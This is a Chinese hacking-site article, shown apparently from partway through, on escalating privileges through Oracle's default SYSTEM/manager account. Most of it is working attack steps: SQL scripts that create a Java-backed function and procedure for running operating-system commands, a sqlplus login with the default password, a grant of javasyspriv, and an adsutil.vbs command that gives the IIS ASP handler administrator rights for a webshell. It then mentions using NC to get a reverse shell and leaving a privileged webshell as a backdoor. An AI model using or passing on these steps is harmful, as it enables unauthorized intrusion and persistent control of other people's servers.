利用ORACLE系统账户默认口令提升权限 - 华夏黑客同盟

服务导航

我要发布

您现在的位置：华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文

利用ORACLE系统账户默认口令提升权限

热 ★★★

【字体：小大】

2.sql

create or replace
function RUN_CMD(p_cmd in varchar2) return number
as
language java
name 'Util.RunThis(java.lang.String) return integer';

3.sql

create or replace procedure RC(p_cmd in varchar2)
as
x number;
begin
x := run_cmd(p_cmd);
end;

保存在c:\下，然后用反连接得到的shell运行

sqlplus system/manager@xxx

然后再来执行脚本

SQL>@C:\1.sql
SQL>@C:\2.sql
SQL>@C:\3.sql

看到JAVA已创建、函数已创建、过程已创建，接着我们继续

SQL> variable x number;
SQL> set serveroutput on
SQL> exec dbms_java.set_output(100000);
SQL>grant javasyspriv to system

看到授权成功。接着我们就可以来执行系统命令了。我想先把ASP.dll加入特权一组

SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps 
"c:\winnt\system32\inetsrv\asp.dll" ');

看到过程已经成功完成，这个时候我们重新登陆我们的webshell，他已经具有admin权限了。接着，再用NC返回一个shell，已经是管理权限的，我们可以做我们想干的事了。因为这个主机有防火墙过滤除80以外的端口，所以不好做图形的后门，只有留下一有权限的webshell。到此已经提权成功。

责任编辑：郭瑞　　联系方式　Email：郭瑞

电话：51228163

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913